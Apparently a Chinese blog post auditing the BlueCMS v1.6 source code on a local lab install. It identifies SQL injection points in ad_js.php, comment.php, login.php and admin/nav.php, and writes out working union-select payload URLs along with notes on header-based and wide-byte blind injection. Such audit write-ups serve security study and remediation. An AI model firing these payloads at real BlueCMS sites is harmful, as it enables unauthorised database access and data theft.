BlueCMS v1.6审计
大致看了下几乎都包含了common.inc.php
ok,看一下这个全局配置文件:
看下deep_addslashes函数
就是简单重下了下addslashe函数,这里先看下Seay的自动审计结果,先不考虑利用有单双引号的
SQL注入:
先去ad_js.php看下:
payload:
view-source:http://127.0.0.1/bluecms_v1.6_sp1/uploads/ad_js.php?ad_id=1%20order%20by%207
view-source:http://127.0.0.1/bluecms_v1.6_sp1/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,database()
注入成功:
SQL注入:
getip()参数可控,虽然是单引号,但是在全局配置里没过滤$_SERVER:
comment.php有利用:
延时成功:
sql注入
login.php
单引号包裹,可以调低下php版本试下宽字节:
盲注成功
sql注入:
admin/nav.php
